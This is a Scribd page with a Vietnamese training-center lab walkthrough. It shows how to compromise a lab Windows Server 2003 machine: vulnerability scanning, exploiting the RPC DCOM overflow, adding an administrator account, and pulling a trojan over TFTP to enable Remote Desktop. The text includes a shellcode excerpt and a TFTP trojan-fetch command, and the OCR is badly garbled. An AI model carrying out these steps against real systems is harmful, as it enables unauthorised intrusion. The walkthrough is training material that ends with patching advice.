System Hacking

The document discusses hacking a Windows Server 2003 system located at IP 192.168.1.210. A vulnerability scan found several vulnerabilities including a buffer overflow in the Windows RPC DCOM interface that could be exploited to gain command shell access. Code was used to exploit this vulnerability and a command shell was obtained. The hacker then created a new user account, enabled remote access by uploading a Trojan, and was able to remotely control the system through the new user.

Uploaded by

ajrojas1359

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

367 views

System Hacking

Uploaded by

ajrojas1359

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 16

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

1. G!O! TH!U v SYSTEN HACK!NG:

System hacking bao gm nhung ky thuat lay user 8 password nang quyn trong h
thng , su dung key logker d lay thng tin v di phuong hoac Hacker c th up Trojan
d m port d tan cng.
i vi phan lay thng tin username 8 password local , Hacker c th crack Password
nu su dung phan mm cai ln may d , hay su dung CD Boot Knoppix d lay syskey ,
buc tip theo la giai ma file Sam d lay Hash cua Account h thng .Hacker c th lay
username 8 password thng qua SNB, NTLN bang ky thuat sniffer (nghe ln trong
mang).
vi phan nang quyn trong h thng , Hacker c th su dung l hng cua Windows,
cac phan mm trong h thng nham lay quyn Admin d diu khin h thng.

2. TAN CONG NAY W!NDOWS SERvER 2003 THONG QUA LO! v OS 8
APPL!CAT!ONS:

Chung ta dung cac Tools d do tm cac thng tin v may tan cng
Bay gio chung ta dung Rentina Security Scanner Enterprise d scan nham muc dich lay
thng tin 8 cac bug li , cac port dang m tai may nan nan
Nay di phuong 192.168.1.210
Nay local 192.168.1.10

Cac buc do tm d xac dinh h diu hanh , cac bug li, cac port dang m
lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Kt qua do tm duoc tu may nan nhan 192.168.1.210

Report Summary

Scanner Name iSPACE Nachines Scanned 1
Scanner version 5.0.10.1076 vulnerabilities Total 11
Scan Start Date 3f18f2008 High Risk vulnerabilities 7
Scan Start Time 3:+7:13 PN
Nedium Risk
vulnerabilities
+

Scan Duration 0h 12m 58s Low Risk vulnerabilities 0
Scan Name Scanning !nformation only Audits 2
Scan Status Completed Credential Used iSPACE

Top 5 Most Vulnerable Hosts

Num. of Vulnerabilities By
Risk

% of Vulnerabilities By Risk

Avg. of Vulnerabilities By
Risk

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Kt qua do tm duoc tai may nan nhan:
Windows Server 2003
Top cac l hng nguy him nhat :
Windows RPC DCON interface buffer overflow
Windows RPC DCON multiple vulnerabilities
Apache 1.3.27 HTDigist Command Excution
Chung ta c th khai thac nhung li nay d lay command shell thng qua port 135
Bug li nay xay ra v Windows Sever 2003 nay chua duoc update hotfix 8 service pack
Phin ban web server apache 1.3.27 cung dang bi li , can phai update ln version mi.

Top nhung l hng nguy him

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Top nhung port dang m may nan nhan

Nhu vay da xac dinh duoc h diu hanh cua may 192.168.1.210 la Windows Server
2003 , cac port dang m , cac li cua h thng. ay la thng tin can thit d nhan din
li , va va li trong top nhung li nguy him nhat. Trong top nhung vulnerabilities ta se
khai thac li thu 7 Windows RPC DCOM interface buffer overflow su dung port 135

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Chung ta ln internet d tm doan code tan cng vao bug li nay, dung doan code bin
dich lai thanh file exe d chay.
oan code d khai thac bug li NS- windows DCON-RPC2 Universal Shellcode

Su dung doan code nay bin dich thanh file .exe d chay hoac dung Neta Exploit c san
bug li d khai thac li nay (dui day la trich 1 phan cua doan code dung d lay shell).

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

ay la doan code dung d khai thac bug li (trich doan)

Qua trnh dang tin hanh lay command shell tu may 192.168.1.210 Windows Server
2003 bang Neta Exploits

; Segment type: Pure code
;seg000 segment byte public 'CODE' use32
; assume cs:seg000
; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C = byte ptr -29Ch
var_28C = byte ptr -28Ch
var_25F = byte ptr -25Fh
var_25+ = dword ptr -25+h
var_250 = dword ptr -250h
var_2+C = dword ptr -2+Ch

seg000 segment byte public 'CODE' use32

beginofpackeddata: ; CODE XREF: UnXORFunc17j
push ebp
mov ebp, esp
sub esp, 80h
mov esi, esp
call sub_191
push eax
mov eax, fs:18h
mov eax, eax30h
lea eax, eax18h
mov ebx, 190000h
mov eax, ebx
pop eax
mov esi, eax
push dword ptr esi
push 0E8AFE98h
call GetFunctionBYName ;WinExec
mov esi0Ch, eax
push dword ptr esi
push 73e2d87eh
call GetFunctionBYName ;ExitProcess
mov esi10h, eax

cn na
lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Hoac c th su dung cng cu Neta exploit da c san bug li nay d tan cng vao may
nan nhan .
ay la qua trnh su dung meta exploit tan cng may nan nhan 192.168.1.210

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Nhu vay , sau qua trnh tan cng chung ta da lay duoc command shell tai may nan
nhan, va cung da chim quyn diu khin h thng . Luc nay c th tao user trong h
thng , lam mi thu chung ta mun.
ay la da C: cua windows server 2003

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Dung lnh tasklist tai command shell d show ra nhung services dang chay trn may
nan nhan

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Bay gio ta se tao user nam trong h thng d remote tu xa vao.
Qua trnh tao user 8 nang quyn nham muc dich chim quyn diu khin h thng

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Nang quyn cho user da tao nam trong group administrators cua h thng, nham muc
dich quan l h thng thng qua cac conection remote tu xa. v user nam trong group
administrator mi remote vao may duoc.

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Khi da c user nam trong group administrator cua h thng, thc hin remote dn may
nan nhan , nhung tai may nay khng m port remote , phai up trojan ln d m port
Qua trnh remote khng thanh cng

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Bay gio ta su dung TFTP d up trojan ln may nan nhan nham muc dich m port d
remote desktop.
Qua trnh dung Cisco TFTP Server d up 1 con trojan ln m port remote desktop
TFTP i 192.168.1.10 Get c:trojan.vbs 192.168.1.210

Start dich vu Telnet tu may nan nhan d connect vao chay trojan mi vua up ln

Dung ln dir d kim tra xem trojan c duoc up ln chua

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Chay con trojan trong giao din console cua Telnet

Thc hin remote desktop bang user da tao
User : ispacehacking password : hacking

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

Qua trnh remote thanh cng , da vao duoc may nan nhan thng qua remote desktop
Giao din windows server 2003

3. KT LUN:
Phan mm scanning rat quan trng vi Hacker d c th phat hin li cua h thng. Sau
khi xac dinh li Hacker c th dung Neta Exploits c san hay code c san trn internet
d tan cng chim quyn diu khin may muc tiu. Nhung phan mm scanning cung la
cng cu huu ich cua Admin quan l h thng, giup Admin h thng danh gia muc d
bao mat cua h thng va kim tra cac bug li lin tuc xay ra.
+. CACH PHNG CHNG L! HACK!NG LOCAL
Thuong xuyn vao cac website securityfocus.com, microsoft.comftechnet d theo di
update cac bang hotfix va service pack cho h thng.
Lun update cac version mi cho applications trong may.
Su dung cng cu windows update c san d cap nhat cho h thng

lSACL l1 1ralnlng CenLer 137c nguyen Chl 1hanh SLr - ulsL 3 - PCMc

G2A
No ratings yet
G2A
1 page
Festo PLC Basic Level TP301-218
0% (1)
Festo PLC Basic Level TP301-218
218 pages
341495MxSpy Trial Free Cell Phone Spy
No ratings yet
341495MxSpy Trial Free Cell Phone Spy
5 pages
Filetype PDF Intex Google Hacking
100% (1)
Filetype PDF Intex Google Hacking
1 page
Industrial Furnaces, 0471387061
90% (10)
Industrial Furnaces, 0471387061
492 pages
31 Steps Learn A New Language - Philip Vang - 2015
No ratings yet
31 Steps Learn A New Language - Philip Vang - 2015
83 pages
Wireless and Mobile Hacking and Sniffing Techniques
From Everand
Wireless and Mobile Hacking and Sniffing Techniques
Dr. Hidaia Mahmood Alassouli
No ratings yet
HACKING
No ratings yet
HACKING
5 pages
COMPUTER Threats
No ratings yet
COMPUTER Threats
12 pages
Windows Hacking - HackersOnlineClub
No ratings yet
Windows Hacking - HackersOnlineClub
4 pages
Paper-1: Ethical Hacking Contents
No ratings yet
Paper-1: Ethical Hacking Contents
7 pages
How To Capture Passwords Using USB Drive
No ratings yet
How To Capture Passwords Using USB Drive
3 pages
Links To Information Security Websites
No ratings yet
Links To Information Security Websites
10 pages
All Hacking Tools
No ratings yet
All Hacking Tools
1 page
Isoftdl Hacking Class 1 Introduction To Ethical Hacking
100% (2)
Isoftdl Hacking Class 1 Introduction To Ethical Hacking
11 pages
Ankit Fadia: Books of Ankit Wadia Are
No ratings yet
Ankit Fadia: Books of Ankit Wadia Are
3 pages
Ethical Hacking Firefox Plugin by Srikanta Sen
No ratings yet
Ethical Hacking Firefox Plugin by Srikanta Sen
131 pages
WWW - Syncmaroute.ca WWW - Ford.ca: Learn How..
No ratings yet
WWW - Syncmaroute.ca WWW - Ford.ca: Learn How..
71 pages
Hacking
No ratings yet
Hacking
76 pages
Hbook
No ratings yet
Hbook
3 pages
eMMC To SD Hack Rescues Data From A Waterlogged Phone - Hackaday
No ratings yet
eMMC To SD Hack Rescues Data From A Waterlogged Phone - Hackaday
10 pages
Steps To Hack IP Address
No ratings yet
Steps To Hack IP Address
2 pages
Types of Hacking
No ratings yet
Types of Hacking
5 pages
Computer Hacking New
No ratings yet
Computer Hacking New
15 pages
Interesting Hacking Techniques
No ratings yet
Interesting Hacking Techniques
6 pages
Pem Child Abuse Training Cirriculum Book-Sanjana Nellipunath
No ratings yet
Pem Child Abuse Training Cirriculum Book-Sanjana Nellipunath
15 pages
Hacking Method 4
100% (1)
Hacking Method 4
1 page
Most Common Weaknesses in A Company: Data and Network Security 1
No ratings yet
Most Common Weaknesses in A Company: Data and Network Security 1
12 pages
Dangerous Combos FAQ
No ratings yet
Dangerous Combos FAQ
23 pages
Roadmap
No ratings yet
Roadmap
13 pages
E Books
No ratings yet
E Books
10 pages
hacking-university-mobile-phone-amp-app-hacking-amp-complete-beginners-guide-to-learn-linux-hacking-mobile-devices-tablets-game-consoles-apps-amp-precisely-hacking-freedom-and-data-driven-book-5
No ratings yet
hacking-university-mobile-phone-amp-app-hacking-amp-complete-beginners-guide-to-learn-linux-hacking-mobile-devices-tablets-game-consoles-apps-amp-precisely-hacking-freedom-and-data-driven-book-5
116 pages
A Hybrid Approach Based Advanced Keylogger
No ratings yet
A Hybrid Approach Based Advanced Keylogger
5 pages
How To Hack Your Friend
No ratings yet
How To Hack Your Friend
3 pages
5 Reasons Why Self-Awareness Is Important
No ratings yet
5 Reasons Why Self-Awareness Is Important
1 page
Hacking
No ratings yet
Hacking
1 page
HACKING
No ratings yet
HACKING
10 pages
How To Get Rich Quick by Dying
No ratings yet
How To Get Rich Quick by Dying
25 pages
Facebookhacking
No ratings yet
Facebookhacking
22 pages
Hacking Notes
100% (1)
Hacking Notes
16 pages
Neo Guide
No ratings yet
Neo Guide
59 pages
USB Hacking
No ratings yet
USB Hacking
10 pages
Hacking 101
No ratings yet
Hacking 101
9 pages
Ethical Hacking Tools You Can
No ratings yet
Ethical Hacking Tools You Can
3 pages
Hacking Method
No ratings yet
Hacking Method
33 pages
SQL Injection Cheat Sheet - Netsparker
No ratings yet
SQL Injection Cheat Sheet - Netsparker
31 pages
Cracking Social Media
No ratings yet
Cracking Social Media
11 pages
Some Hacking Book
100% (1)
Some Hacking Book
4 pages
Health Related Link Building
No ratings yet
Health Related Link Building
84 pages
Insecure Mag 47
No ratings yet
Insecure Mag 47
81 pages
Hack
50% (2)
Hack
21 pages
Hobbies Interests To Put On A Resume - TO PRACTISE
No ratings yet
Hobbies Interests To Put On A Resume - TO PRACTISE
4 pages
Hacked Email2
No ratings yet
Hacked Email2
8 pages
TII Quick Guide To:: Facebook Search Strings
No ratings yet
TII Quick Guide To:: Facebook Search Strings
1 page
Ethical Hacking: BSC Computer Science
No ratings yet
Ethical Hacking: BSC Computer Science
31 pages
Cyber Crimes
No ratings yet
Cyber Crimes
28 pages
Instant Download The Linux DevOps Handbook: Customize and scale your Linux distributions to accelerate your DevOps workflow Wojsław PDF All Chapters
100% (1)
Instant Download The Linux DevOps Handbook: Customize and scale your Linux distributions to accelerate your DevOps workflow Wojsław PDF All Chapters
50 pages
Efi Firmware File System Specification
No ratings yet
Efi Firmware File System Specification
40 pages
Special Computer Resource Linked & Websites
No ratings yet
Special Computer Resource Linked & Websites
9 pages
01 - Introduction To Ethical Hacking
No ratings yet
01 - Introduction To Ethical Hacking
26 pages
Love Letters
From Everand
Love Letters
Sandra Leigh Savage
No ratings yet
PSP Hacks, Mods, and Expansions
From Everand
PSP Hacks, Mods, and Expansions
Dave Prochnow
No ratings yet
proxy servers Third Edition
From Everand
proxy servers Third Edition
Gerardus Blokdyk
No ratings yet
DG1 Installation Manual MN040002EN
50% (2)
DG1 Installation Manual MN040002EN
113 pages
TechnicalData EMD-350 Inso PDF
No ratings yet
TechnicalData EMD-350 Inso PDF
2 pages
Termostato RTR-E 3000 Series
No ratings yet
Termostato RTR-E 3000 Series
2 pages
Zelio Control RM35LM33MW
No ratings yet
Zelio Control RM35LM33MW
3 pages
Vol06 Tab021
No ratings yet
Vol06 Tab021
274 pages
Model: MX12S-2SA: Flow Meters Solvent
No ratings yet
Model: MX12S-2SA: Flow Meters Solvent
3 pages
Therm Webservices GB
No ratings yet
Therm Webservices GB
6 pages
Learn Any Language - Progress Without Stress! - Joan Pattison - 2015
100% (1)
Learn Any Language - Progress Without Stress! - Joan Pattison - 2015
54 pages
Mech-Vi-Design of Machine Elements II (10me62) - Notes
86% (14)
Mech-Vi-Design of Machine Elements II (10me62) - Notes
368 pages
Modicon Quantum Automation Platform 140CPU65150
No ratings yet
Modicon Quantum Automation Platform 140CPU65150
3 pages
Practical Thermal Design of Shell-And-Tube Heat Exchangers
100% (11)
Practical Thermal Design of Shell-And-Tube Heat Exchangers
243 pages
Practical Thermal Design of Shell-And-Tube Heat Exchangers
100% (11)
Practical Thermal Design of Shell-And-Tube Heat Exchangers
243 pages
Modicon Premium Cata
No ratings yet
Modicon Premium Cata
459 pages
P2500-1-P2500-1e GB
No ratings yet
P2500-1-P2500-1e GB
4 pages
Fgwilson Compass v2008b - Mgb062011 Perkins Engine
No ratings yet
Fgwilson Compass v2008b - Mgb062011 Perkins Engine
347 pages